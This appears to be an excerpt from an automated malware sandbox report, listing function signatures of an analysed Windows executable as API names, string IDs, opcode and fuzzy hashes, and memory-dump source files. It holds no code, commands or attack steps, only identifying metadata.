                                                                                                                                                                              • Instruction Fuzzy Hash: ECE1887220468086EB66DB27E5903EA37A1F78CBD4F084526EF4A27BB5DF39C840C701
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CastChainChangeClipboardDynamic
                                                                                                                                                                              • String ID: Out of memory.$Parameter #1 invalid.$Parameter #2 invalid.
                                                                                                                                                                              • API String ID: 105095322-136517104
                                                                                                                                                                              • Opcode ID: cb1dace055b36dab73e08383e411fc130bd4468ce27e96fa974db8b229486dc4
                                                                                                                                                                              • Instruction ID: 72aa8029bdfcf4eef3f61d91cefb473bcb0a1f6f01ddf18fdd73c6b9c0c97178
                                                                                                                                                                              • Opcode Fuzzy Hash: cb1dace055b36dab73e08383e411fc130bd4468ce27e96fa974db8b229486dc4
                                                                                                                                                                              • Instruction Fuzzy Hash: D451AC71601B0081FF33DB27E9447EA66A1B78CBC4F494826EF4967AB5EB3AC841C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                              • String ID: \\.\%c:
                                                                                                                                                                              • API String ID: 33631002-1260769427
                                                                                                                                                                              • Opcode ID: 51ba58c44234e0452f71825d3504733d234ef9ffd9e34a3a7a7de06c2e3b0600
                                                                                                                                                                              • Instruction ID: 3bef72625b741ab084ac48f361afd676c1660246cec715d60023b9952c02e508
                                                                                                                                                                              • Opcode Fuzzy Hash: 51ba58c44234e0452f71825d3504733d234ef9ffd9e34a3a7a7de06c2e3b0600
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C115132618B8092D721CB11F44078AB3A4F3987E0F504326EB9943FA8DF3CC955CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundIconicShowVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1792044539-0
                                                                                                                                                                              • Opcode ID: 323d851a5d86d8e78e1cc1d88d7e9eaf91db61210707d7343b8952a3f91db42d
                                                                                                                                                                              • Instruction ID: 0682938d7b25976a749adbacffbf7f7ee7ebf1e817b6f3c36f216a9f9dc55e7d
                                                                                                                                                                              • Opcode Fuzzy Hash: 323d851a5d86d8e78e1cc1d88d7e9eaf91db61210707d7343b8952a3f91db42d
                                                                                                                                                                              • Instruction Fuzzy Hash: EB316D3260578485FE729B13A4683EA66E0F75CBD0F448115FB890BBA9EF7CC6818704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundKeyboardLayoutProcessScanThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2198974680-0
                                                                                                                                                                              • Opcode ID: 31eaca18f2a52bd674596f7fadbd92a67bceeaead20581470c8a18e0cad3f0f1
                                                                                                                                                                              • Instruction ID: 1d03c28db23a8517f792269eaabf8888d864c0f24eaedc1cff8c20affc6a9250
                                                                                                                                                                              • Opcode Fuzzy Hash: 31eaca18f2a52bd674596f7fadbd92a67bceeaead20581470c8a18e0cad3f0f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C21F472A0574086EB5ADF17B9943A876A1FB4CBC0F554128EB4A47BB5DB3EC882C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClipboardCountOpenTick
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 420724667-0
                                                                                                                                                                              • Opcode ID: 35ef54e439cabbf71b299015ed1146e5f704e6173d99c56d66aa156dba6be23b
                                                                                                                                                                              • Instruction ID: 844f528ee6dc662e3bb0189f467f393fe4fe9b166e64d7940e050903264bfb5a
                                                                                                                                                                              • Opcode Fuzzy Hash: 35ef54e439cabbf71b299015ed1146e5f704e6173d99c56d66aa156dba6be23b
                                                                                                                                                                              • Instruction Fuzzy Hash: 5111B27161160087F7569B27A8543EA23A1EB8C7DAF581118FB1A47BB5DB78C4D1DB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientForegroundIconicRectScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4031265896-0
                                                                                                                                                                              • Opcode ID: e1c025826b533df3a8f7b1a32ad2b8fea82fc6e013546c45a7e0af0dcbc18c40
                                                                                                                                                                              • Instruction ID: 420adf0137e74385c68b4fab4adc0a61758b0ce34ec147b8b372fe71e6be38e2
                                                                                                                                                                              • Opcode Fuzzy Hash: e1c025826b533df3a8f7b1a32ad2b8fea82fc6e013546c45a7e0af0dcbc18c40
                                                                                                                                                                              • Instruction Fuzzy Hash: 6811EF32209B40C6EB65DB5BE444399B3E0F749BD4F044125FB8943A78EF78CA55CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 0-2978689999
                                                                                                                                                                              • Opcode ID: c70542f700f6d098cbf844d0171326ba5d48325dea995c0c4cd2acbf3ef9c25e
                                                                                                                                                                              • Instruction ID: 8da53eed4f8096943430f0f426e3540e30361601dacb0c7a802a004e08b2c735
                                                                                                                                                                              • Opcode Fuzzy Hash: c70542f700f6d098cbf844d0171326ba5d48325dea995c0c4cd2acbf3ef9c25e
                                                                                                                                                                              • Instruction Fuzzy Hash: C691E27160571485FB2A8F2B98503B9229AE74EBD8F648925FF5E47EF4DE39C4429300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                              • Opcode ID: a4ba192f34cb14f1be87fd0ad62269652c9cee304b49aa3a07e6b272cc409d05
                                                                                                                                                                              • Instruction ID: 64864dd45c1473883d6efcdbffc386a67a83a93b4a3cc09d9a6bb3744db0b6ec
                                                                                                                                                                              • Opcode Fuzzy Hash: a4ba192f34cb14f1be87fd0ad62269652c9cee304b49aa3a07e6b272cc409d05
                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD1A0327146C587EB75CF16E1847AAB7A1F7AC7C4F148224EB4A57B64DA3CE981CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundKeyboardLayoutProcessThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 620179318-0
                                                                                                                                                                              • Opcode ID: eb4181835ded9bcb8e75848920d8a0ae98ec7ab5a574e89e42ed8c352d816526
                                                                                                                                                                              • Instruction ID: 367901c36b6b4db2780135b97616c509dd967937fcc6e46d04cab3578b5833fd
                                                                                                                                                                              • Opcode Fuzzy Hash: eb4181835ded9bcb8e75848920d8a0ae98ec7ab5a574e89e42ed8c352d816526
                                                                                                                                                                              • Instruction Fuzzy Hash: 9951F676705B40C7EA66EB2BF4943AA32A0FB4A7E5F544529FB89437F4DB38C4809700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 48322524-0
                                                                                                                                                                              • Opcode ID: 78623a590fd4ac922d2dd50725788ace720d02894296dc7b00d289bef885c016
                                                                                                                                                                              • Instruction ID: 3b6d71697b4364919c41a067718e5337948b48f41352adf92319f46571a47e12
                                                                                                                                                                              • Opcode Fuzzy Hash: 78623a590fd4ac922d2dd50725788ace720d02894296dc7b00d289bef885c016
                                                                                                                                                                              • Instruction Fuzzy Hash: 60F0547560570192EE165722B8453E813516B99BB1F581730BE3D077F0EB7C8ADA5500
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $.$0
                                                                                                                                                                              • API String ID: 0-3444660880
                                                                                                                                                                              • Opcode ID: 7faf6b3a0802387ae1a1f4a951c764a9f5dff5361bb01b5595373f707b7bef3d
                                                                                                                                                                              • Instruction ID: afc76e5955cec08a2e310aafdfa5925d1fa8b538d34a1948db0db94718321ab9
                                                                                                                                                                              • Opcode Fuzzy Hash: 7faf6b3a0802387ae1a1f4a951c764a9f5dff5361bb01b5595373f707b7bef3d
                                                                                                                                                                              • Instruction Fuzzy Hash: FCB1D336A0855541FBBB6B2B81513FB6394EBAD7DDF448222FF42571F5EB388882C200
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $.$0
                                                                                                                                                                              • API String ID: 0-3444660880
                                                                                                                                                                              • Opcode ID: df4e1a8de836a0efb5e770a4bc9830c0ee65be3cfc1bc2c2509eebbbde243118
                                                                                                                                                                              • Instruction ID: 529f76eb3511de9e85388212d18fdd28b96532c4e985ef63817c07d37cec0de2
                                                                                                                                                                              • Opcode Fuzzy Hash: df4e1a8de836a0efb5e770a4bc9830c0ee65be3cfc1bc2c2509eebbbde243118
                                                                                                                                                                              • Instruction Fuzzy Hash: AAA1E036A0466541FBBB6A2781513FF63C1EB5C7DDF488126BF82471F6EB38C9819205
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePost$KeyboardState
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 857446259-2978689999
                                                                                                                                                                              • Opcode ID: 20cfa61a39722425880bec395ed937b2c49b8af9179bc6618accc7463cc8174e
                                                                                                                                                                              • Instruction ID: 0d7041ce7dd93f22d44043a7b3657cbfc4e988c73f9265e468aa7d2111adc995
                                                                                                                                                                              • Opcode Fuzzy Hash: 20cfa61a39722425880bec395ed937b2c49b8af9179bc6618accc7463cc8174e
                                                                                                                                                                              • Instruction Fuzzy Hash: 70F0A072954AA096E66FC62794513F8B391AB9D3E5F840306BB824B6F7D67AC4449200
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 31f262ef353b38351f4b968d5d1cad794372509e5dd081e115cd5fc9c8d3b902
                                                                                                                                                                              • Instruction ID: 8cd9e68a7c6af0386916f4c8fd36eb9c8d5621425cd8588278dbb3c7f6dbf277
                                                                                                                                                                              • Opcode Fuzzy Hash: 31f262ef353b38351f4b968d5d1cad794372509e5dd081e115cd5fc9c8d3b902
                                                                                                                                                                              • Instruction Fuzzy Hash: EE02037220468081FB769B37A4503ED27A1E74DBC4F564125EB9A17BF5EF38C891CB0A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ChildEnumForegroundVisibleWindows
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3013317313-0
                                                                                                                                                                              • Opcode ID: 7d55d2f1a04a1c63b9fde52f9226225b9a672f4941fc6bad323c731e46ee3815
                                                                                                                                                                              • Instruction ID: 8dd954b12cd06a11801bda5e3cac4fd2709cc8238aed3151e912f52fb3103ba5
                                                                                                                                                                              • Opcode Fuzzy Hash: 7d55d2f1a04a1c63b9fde52f9226225b9a672f4941fc6bad323c731e46ee3815
                                                                                                                                                                              • Instruction Fuzzy Hash: 70518F72618B9085EB529B26B5403DA67A1F7CDBE4F5A1321FBA943BF5CF38C4418B04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$CurrentProcessWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1042118053-0
                                                                                                                                                                              • Opcode ID: 8ef75c742bfb1125661236784b8f0b37d81d29f6ad2e9cfdeb021c537998dba4
                                                                                                                                                                              • Instruction ID: 3c8eb134d4927d6ba55da218f2b0c2c6c429a98023e2e67114cafec166c6ae1e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ef75c742bfb1125661236784b8f0b37d81d29f6ad2e9cfdeb021c537998dba4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1232257211C2D146F7B78B26A5527EFAE91A79A3D8F041119FBC10BEFAC63BC5448B10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
